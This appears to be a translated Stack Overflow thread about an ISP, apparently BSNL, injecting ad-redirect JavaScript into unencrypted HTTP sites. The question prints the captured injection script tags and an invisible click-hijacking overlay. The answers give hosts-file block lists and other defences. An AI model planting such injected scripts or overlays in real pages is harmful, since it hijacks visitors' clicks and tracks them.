logo标签列表

未知脚本正在运行并在点击时重定向到未知网站。

javascriptjqueryhtmlcssmalware
13

问题:有时,在我的Bootstrap网站上单击NAVBAR菜单或任何div时,它会在新标签页中将页面重定向到广告或未知链接之类的内容,类似于以下内容:

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

从托管文件导入的链接:

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

我的检查结果:

当菜单点击没有重定向时,我多次检查了我的代码,但是没有发现可疑的东西......但是当我点击重定向链接时,在浏览器中检查我的代码,我可以清楚地看到一些脚本源添加到我的文件中(只能在浏览器的检查模式下看到)。它们没有被写入我的代码。我的代码中有未知的部分。

1)以下2个脚本正在替换头标签中的script js/jquery.min.js

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) 我将谷歌API导入后,这个代码被添加到body标记中:

Translated text:

2) This code is being added to the body tag after I imported the Google API:

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) 这个也在 body 标签中。

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4)检查重定向链接。头信息如下:

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

我尝试过的方法:

我的代码很干净,没有脚本将其重定向到其他地方。可能是我的浏览器或Windows系统受到了损害。我从EDGE,CHROME,FIREFOX三个浏览器中检查了网站,都有同样的问题。然后我升级到了Windows 10并进行了全新安装。但仍然没有改变。然后我想问Hostgator支持人员是否服务器被攻击了,他们回复说从他们这边看起来没问题...... 我安装了malwarebytes和所有软件来解决这个问题......但它们只是通知chrome/firefox/Edge正在将其重定向到带有一些域名的外部ID,大多数情况下是go.oclasrv.com,并没有做任何事情。

**

有什么解决办法吗???

**

更新:

我在Hostgator支持反馈链接上遇到了类似的重定向问题...

注意到,在此字符串中,域名被替换为rateus.in zoneid=1492761对于我打开的任何不安全的链接都是相同的。 同时,cb=xxxxxxxxxxxx和tm=xxxxxxxxxxx会针对不同的链接而改变,而fingerprint=c2VwLW5vLXJlZGlyZWN0对于我打开的所有链接都是相同的。

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

我的操作系统已完全升级到WIN10专业版,并且我仅安装了Chrome浏览器,没有任何插件...

问题与浏览器无关,因为我在EDGE和Firefox上得到了相同的结果。

有没有JS专家可以在这里帮助我

听起来像是病毒或JS注入。我们对此无能为力。 - Paulie_D
这可能有帮助,但您可以尝试通过HTTPS提供站点服务吗?这将有助于确定在传输内容的过程中篡改发生的位置。 - zero298
3
由于BSNL在未加密的HTTP请求时注入其广告脚本,因此会发生这种情况。您可以根据此文章https://davidsekar.com/misc/block-bsnl-ads-using-ipsec在您的本地计算机/域系统上添加IP安全策略来解决问题。 - David Chelliah
类似的投诉在https://www.reddit.com/r/india/comments/8wj6ec/bsnl_and_mtnl_are_injecting_malicious_ads_on/上报告。 - Agnel Vishal
BSNL网络是真正的罪犯。 - Mohammedshafeek C S
7个回答
15

看起来这是ISP注入JavaScript文件的情况。你是否恰好使用BSNL宽带?最近几天,BSNL似乎在HTTP(非加密)网站中注入广告软件。

我知道的唯一解决方案是将您的网站托管在https上,或更换ISP。

是的。这种情况发生在BSNL宽带和BSNL移动上。他们正在拦截HTTP流量并注入广告软件,推送Javascript文件。 - Jayson Chacko
1
同样的问题在这里。 - Gaurav Rai
1
您也可以通过路由器阻止对117.240.205.115:3000的请求,直到BSNL解决此问题。我在我的D-LINK路由器上做了同样的事情。但请通过申诉和使用Twitter报告此问题。 - nav
从这个页面 https://www.quora.com/What-is-cobalten-com-redirect-virus 如果使用Chrome,请转到 http://chrome://settings/content/javascript 并在“阻止”部分添加 [*.]cobalten.com。这样可以停止在我的BSNL宽带和移动数据上弹出的窗口。 - Indraneel
这并不一定是你的主机问题。如果你在任何服务器上访问任何网站,如果该网站不是https,你的点击就会被劫持。这是否意味着你不浏览任何非https网站? - Joshi
显示剩余5条评论
1
你遇到的问题是服务器端的。很可能你的代码没有问题,但是服务器被恶意软件感染,将这个糟糕的代码注入到你的网站中。
为了解决这个问题,我建议你先备份你写的代码,然后更改FTP托管密码,清空服务器,再将你的代码添加回去。如果这样不能解决问题,那么你需要更换托管提供商。
目前我在Hostgator的共享主机计划上。由于这是一个静态网站,我无法为其承担专用服务器的费用。我可以为域名添加SSL证书,但不知道这是否能解决我的问题。Hostgator的支持非常糟糕。他们的回答是“你想让我怎么做”。 - aman
另外,在HostGator上添加像Sitelock Malware Protector这样的保护附加组件,是否能够有效地防止恶意软件攻击?或者,我猜想他们有意感染共享主机以销售他们的附加组件...有没有更好的无恶意软件共享主机提供商,适用于加拿大地区,并且具有最佳的正常运行时间。 - aman
我建议您先备份所有没有恶意软件的代码,然后删除您可以访问到的服务器上的所有文件。接着更改所有密码(将其设置为复杂密码),最后再将您的文件重新添加回去。您试过这个方法吗? - Jake Chasan
我在托管在Godaddy共享服务器上的网站上遇到了完全相同的问题。 - Ashish Rathee
似乎有一些新的恶意软件。 - Ashish Rathee
显示剩余3条评论
0
如果您看到以下IP地址注入了未知脚本,则这是由BSNL ISP注入的脚本文件。
61.0.245.90, 117.205.13.171

这些脚本只在您访问HTTP网站时注入。HTTPS涉及传输层安全,因此无法被ISP篡改。

来自该IP的脚本文件只是一个通道,它从不同的广告媒体下载进一步的广告脚本。大多数这些广告媒体都通过劫持用户鼠标点击来打开他们的弹出窗口进行侵入式广告。

BSNL为此活动的借口是增强其订户的浏览体验的特性。有一篇详细的文章写到 BSNL 注入这样的脚本以及如何停止它们。

0

干得好!

由于安全性差,BSNL服务器每天都在受到恶意软件/病毒的破坏或感染。

naganoadigei.com专门注册用于提供恶意软件并将用户重定向到钓鱼网站。

最近在2019年2月,他们解决了这个问题。但不幸的是,在2019年2月发现了一种新型基于广告的重定向,即humparsi.com

您可以通过访问Sucuri来查看该网站是否已被感染。

或者,您可以通过DNS条目在独立系统中阻止出站请求

导航到%windir%\System32\drivers\etc并以提升的模式/使用管理员授权编辑hosts文件,并将这些行添加到您的hosts文件中

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

以上网站未使用SSL进行保护

要阻止特定IP地址,可以通过防火墙中的出站边界阻止它们

为了减少影响或任何不太可能的负面影响,您可以通过安装Add-ons(例如NoScriptScriptSafeHTTPS Everywhere)来阻止JavaScript

要找出哪个应用程序使用分配的端口号的IP地址:

C:\Windows\system32>netstat -anob
现在它正在通过xalabazar.com重定向我。 - Udayraj Deshmukh
只需保护您的浏览器指纹。您能否提供一下通过 xalabazar.com 重定向到哪些网站?这是来自宽带连接还是其他途径?我需要通过BSNL SIM确认一下。@UdayrajDeshmukh - Nɪsʜᴀɴᴛʜ ॐ
我已经在BSNL宽带连接上进行了检查。我相信这是由于点击劫持在每个http网站上随机间隔发生的。请尝试访问此链接(http://www.memo.tv),您可能需要重新加载并单击按钮约5分钟以确认。 - Udayraj Deshmukh
发现了这个链接的脚本:请注意,在点击此链接之前,因为它会将您的所有浏览信息传输到IP地址117.254.84.212。它在BSNL SIM数据上不起作用。 - Nɪsʜᴀɴᴛʜ ॐ
这里的脚本被注入到/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp,您可以通过从Node.js加载的方法中找到getjs()路由getjs链接来获取我们从BSNL SIM /任何其他ISP获取的IP地址@UdayrajDeshmukh。 - Nɪsʜᴀɴᴛʜ ॐ
显示剩余3条评论
0

Adguard已根据此处提供的参考修复了该问题以阻止点击劫持。 该脚本可在移动浏览器中使用,并打开新标签页广告。

更新您的Adguard过滤器至最新版本以查看。

0

只需在路由器的安全选项中阻止URL(bsnl IP注入这些广告)。对我来说,bsnl URL是http://117.254.84.212

0
网页内容由stack overflow 提供, 点击上面的
可以查看英文原文,
原文链接